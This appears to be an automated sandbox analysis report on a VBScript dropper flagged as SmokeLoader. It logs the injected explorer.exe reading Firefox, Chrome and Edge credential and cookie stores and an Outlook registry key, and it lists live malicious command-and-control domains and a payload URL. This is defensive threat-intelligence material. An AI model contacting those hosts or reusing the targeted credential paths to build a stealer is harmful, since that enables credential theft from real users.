            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\7a27ea16-e265-40c0-823c-0125abf7d855Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\permissions.sqliteJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10\1696491690344.6260e81e-5ef5-4137-a0a5-7930ea6f0a75.main.jsonlz4Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\compatibility.iniJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite-shmJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\054622d9-6ed7-4f25-87fd-b3a9cd668b65Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\extension-preferences.jsonJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\12672553-cb8c-4210-ae02-a59c1a541208Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\5e0297e1-aa9b-4634-aaf1-cfd1f718b993Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\b3c274f7-6fd8-4832-989b-74a48f86b6b5Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\6db12043-3902-4d45-8c5d-d992fbf6d4e7Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-shmJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqliteJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-walJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\webappsstore.sqlite-shmJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\session-state.jsonJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\xulstore.jsonJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cert9.dbJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-walJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\e6e57dc0-d354-4d4a-8374-548b8e2bcc5dJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\times.jsonJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\handlers.jsonJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\db\data.safe.binJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10\1696491690347.6786f292-c1be-4996-99cd-77aa855c1844.first-shutdown.jsonlz4Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings\ff032c8b-05e6-43c9-9e84-732dbe7aca27Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-walJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\archived\2023-10\1696491695606.ff032c8b-05e6-43c9-9e84-732dbe7aca27.event.jsonlz4Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqliteJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\758d1c71-5fff-4193-9977-7a57afa68bf7Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\3b7fc3d4-90d3-48a3-834f-e61d315e9a5cJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\search.json.mozlz4Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-shmJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite-walJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\favicons.sqlite-shmJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\6c257ec7-9ee7-4e42-91a6-7d3b50c23b76Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\favicons.sqliteJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\010cab1b-3626-48b5-9d6b-0e4dfe4db5faJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-walJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\sessionstore-backups\previous.jsonlz4Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\content-prefs.sqliteJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\webappsstore.sqliteJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\webappsstore.sqlite-walJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\containers.jsonJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqliteJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\sessionCheckpoints.jsonJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\ls-archive.sqliteJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\7f0194d6-62d6-4174-a7ed-55ebc13aacb4Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\addons.jsonJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\pending_pings\2b167346-5f76-4c00-8f97-19cee0df0fbaJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\sessionstore-backups\upgrade.jsonlz4-20230927232528Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.dbJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings\6260e81e-5ef5-4137-a0a5-7930ea6f0a75Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\sessionstore.jsonlz4Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\favicons.sqlite-walJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage.sqliteJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\glean\events\background-updateJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings\edd11145-a3b3-4ebf-ba7b-14b7ec08f19fJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\datareporting\state.jsonJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\addonStartup.json.lz4Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\saved-telemetry-pings\3be89113-af2b-4b48-9c47-40ac1156f7a2Jump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-shmJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior

            Remote Access Functionality

            barindex
            Yara detected SmokeLoader
            Source: Yara matchFile source: 00000018.00000002.2523151456.00000000009E1000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.2523725408.0000000000861000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 2908, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 3988, type: MEMORYSTR
            Source: Yara matchFile source: 11.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000B.00000002.1527132881.0000000002881000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.1526950876.0000000002860000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information321
            Scripting            		Valid Accounts11
            Native API            		321
            Scripting            		1
            DLL Side-Loading            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		1
            System Time Discovery            		Remote Services1
            Archive Collected Data            		3
            Ingress Tool Transfer            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts2
            Exploitation for Client Execution            		1
            DLL Side-Loading            		623
            Process Injection            		1
            Deobfuscate/Decode Files or Information            		11
            Input Capture            		3
            File and Directory Discovery            		Remote Desktop Protocol1
            Data from Local System            		2
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts1
            Command and Scripting Interpreter            		Logon Script (Windows)Logon Script (Windows)3
            Obfuscated Files or Information            		1
            Credentials in Registry            		127
            System Information Discovery            		SMB/Windows Admin Shares1
            Email Collection            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts2
            PowerShell            		Login HookLogin Hook1
            DLL Side-Loading            		NTDS431
            Security Software Discovery            		Distributed Component Object Model11
            Input Capture            		114
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
            Masquerading            		LSA Secrets141
            Virtualization/Sandbox Evasion            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts141
            Virtualization/Sandbox Evasion            		Cached Domain Credentials13
            Process Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items623
            Process Injection            		DCSync1
            Application Window Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            Hidden Files and Directories            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1586466 Sample: sweetnessgoodforgreatnessth... Startdate: 09/01/2025 Architecture: WINDOWS Score: 100 47 prolinice.ga 2->47 49 res.cloudinary.com 2->49 67 Suricata IDS alerts for network traffic 2->67 69 Found malware configuration 2->69 71 Malicious sample detected (through community Yara rule) 2->71 73 11 other signatures 2->73 11 wscript.exe 2 2->11         started        14 uahuajd 2 2->14         started        signatures3 process4 signatures5 83 VBScript performs obfuscated calls to suspicious functions 11->83 85 Suspicious powershell command line found 11->85 87 Wscript starts Powershell (via cmd or directly) 11->87 89 2 other signatures 11->89 16 powershell.exe 14 16 11->16         started        20 conhost.exe 14->20         started        process6 dnsIp7 45 192.3.27.144, 49763, 80 AS-COLOCROSSINGUS United States 16->45 63 Writes to foreign memory regions 16->63 65 Injects a PE file into a foreign processes 16->65 22 aspnet_compiler.exe 16->22         started        25 conhost.exe 16->25         started        signatures8 process9 signatures10 75 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 22->75 77 Maps a DLL or memory area into another process 22->77 79 Checks if the current machine is a virtual machine (disk enumeration) 22->79 81 2 other signatures 22->81 27 explorer.exe 25 3 22->27 injected process11 dnsIp12 51 prolinice.ga 46.173.214.14, 49913, 49942, 49987 GARANT-PARK-INTERNETRU Russian Federation 27->51 43 C:\Users\user\AppData\Roaming\uahuajd, PE32 27->43 dropped 91 Benign windows process drops PE files 27->91 93 Injects code into the Windows Explorer (explorer.exe) 27->93 95 Writes to foreign memory regions 27->95 97 Hides that the sample has been downloaded from the Internet (zone.identifier) 27->97 32 explorer.exe 20 27->32         started        35 explorer.exe 27->35         started        37 explorer.exe 27->37         started        39 6 other processes 27->39 file13 signatures14 process15 signatures16 53 System process connects to network (likely due to code injection or exploit) 32->53 55 Found evasive API chain (may stop execution after checking mutex) 32->55 57 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 32->57 61 3 other signatures 32->61 59 Tries to harvest and steal browser information (history, passwords, etc) 35->59 41 WerFault.exe 21 39->41         started        process17

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            sweetnessgoodforgreatnessthingswithgood.tIF.vbs16%ReversingLabsWin32.Trojan.Generic
            sweetnessgoodforgreatnessthingswithgood.tIF.vbs13%VirustotalBrowse

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\uahuajd0%ReversingLabs

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://www.pollensense.com/0%Avira URL Cloudsafe
            http://prolinice.ga/ndex.php0%Avira URL Cloudsafe
            http://prolinice.ga/index.php100%Avira URL Cloudmalware
            http://vilendar.ga/index.php100%Avira URL Cloudmalware
            http://prolinice.ga/0%Avira URL Cloudsafe
            http://prolinice.ga/O0%Avira URL Cloudsafe
            http://www.foreca.com0%Avira URL Cloudsafe
            http://192.3.27.144/250/evenmegoodfor.txt100%Avira URL Cloudmalware
            http://prolinice.ga/index.phpMozilla/5.00%Avira URL Cloudsafe
            http://prolinice.ga/application/x-www-form-urlencodedMozilla/5.00%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            prolinice.ga
            		46.173.214.14
            		truetrue
              		unknown
              res.cloudinary.com
              		unknown
              		unknownfalse
                		high

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://prolinice.ga/index.phptrue
                • Avira URL Cloud: malware
                		unknown
                http://vilendar.ga/index.phptrue
                • Avira URL Cloud: malware
                		unknown
                http://192.3.27.144/250/evenmegoodfor.txtfalse
                • Avira URL Cloud: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                https://api.msn.com/v1/news/Feed/Windows?explorer.exe, 0000000C.00000000.1506729663.0000000008F09000.00000004.00000001.00020000.00000000.sdmpfalse
                  		high
                  https://duckduckgo.com/chrome_newtabexplorer.exe, 0000000E.00000003.1729678336.0000000000D30000.00000004.00000020.00020000.00000000.sdmp, 344.tmp.14.drfalse
                    		high
                    https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actuaexplorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                      		high
                      http://prolinice.ga/ndex.phpexplorer.exe, 0000000E.00000002.1757266577.0000000000D1B000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://duckduckgo.com/ac/?q=explorer.exe, 0000000E.00000003.1729678336.0000000000D30000.00000004.00000020.00020000.00000000.sdmp, 344.tmp.14.drfalse
                        		high
                        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaTexplorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                          		high
                          https://www.pollensense.com/explorer.exe, 0000000C.00000000.1504447706.00000000071B2000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://api.msn.com:443/v1/news/Feed/Windows?texplorer.exe, 0000000C.00000000.1504447706.0000000007276000.00000004.00000001.00020000.00000000.sdmpfalse
                            		high
                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                              		high
                              https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-worldexplorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                		high
                                https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                  		high
                                  https://www.msn.com/en-us/weather/topstories/here-s-who-could-see-above-average-snowfall-this-winterexplorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                    		high
                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=explorer.exe, 0000000E.00000003.1729678336.0000000000D30000.00000004.00000020.00020000.00000000.sdmp, 344.tmp.14.drfalse
                                      		high
                                      https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/viexplorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                        		high
                                        https://excel.office.comexplorer.exe, 0000000C.00000000.1509467961.000000000C091000.00000004.00000001.00020000.00000000.sdmpfalse
                                          		high
                                          https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-explorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                            		high
                                            https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-bexplorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                              		high
                                              http://schemas.microexplorer.exe, 0000000C.00000000.1506335410.0000000008810000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000000.1506356157.0000000008820000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000000.1505560118.0000000007C70000.00000002.00000001.00040000.00000000.sdmpfalse
                                                		high
                                                https://github.com/koswald/VBScript/blob/master/SetupPerUser.mdwscript.exe, 00000000.00000003.1223863747.00000148B37CE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1224054764.00000148B37CE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1226918992.00000148B15AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1227341104.00000148B3441000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1223724844.00000148B3378000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1223795021.00000148B3341000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1227807236.00000148B3551000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1226786106.00000148B37CF000.00000004.00000020.00020000.00000000.sdmp, sweetnessgoodforgreatnessthingswithgood.tIF.vbsfalse
                                                  		high
                                                  https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINtexplorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch-explorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchexplorer.exe, 0000000E.00000003.1729678336.0000000000D30000.00000004.00000020.00020000.00000000.sdmp, 344.tmp.14.drfalse
                                                          		high
                                                          https://res.cloudinary.com/powershell.exe, 00000002.00000002.1452333990.000001478891E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-itexplorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://api.msn.com/v1/news/Feed/Windows?activityId=DD4083B70FE54739AB05D6BBA3484042&timeOut=5000&ocexplorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://wns.windows.com/explorer.exe, 0000000C.00000000.1506729663.00000000090F2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://github.com/koswald/VBScriptsweetnessgoodforgreatnessthingswithgood.tIF.vbsfalse
                                                                    		high
                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.1453214012.000001478A7E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://www.autoitscript.com/autoit3/Jexplorer.exe, 0000000C.00000000.1509467961.000000000C3F7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.1765549035.000000000C44D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://word.office.comexplorer.exe, 0000000C.00000000.1509467961.000000000C091000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://www.google.com/images/branding/product/ico/googleg_lodp.icoexplorer.exe, 0000000E.00000003.1729678336.0000000000D30000.00000004.00000020.00020000.00000000.sdmp, 344.tmp.14.drfalse
                                                                            		high
                                                                            https://www.msn.com/en-us/music/news/6-rock-ballads-that-tug-at-the-heartstrings/ar-AA1hIdsmexplorer.exe, 0000000C.00000000.1504447706.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.1453214012.000001478AA04000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.1453214012.000001478AA04000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://prolinice.ga/explorer.exe, 0000000E.00000002.1757266577.0000000000D26000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.1757266577.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.1757266577.0000000000D3A000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
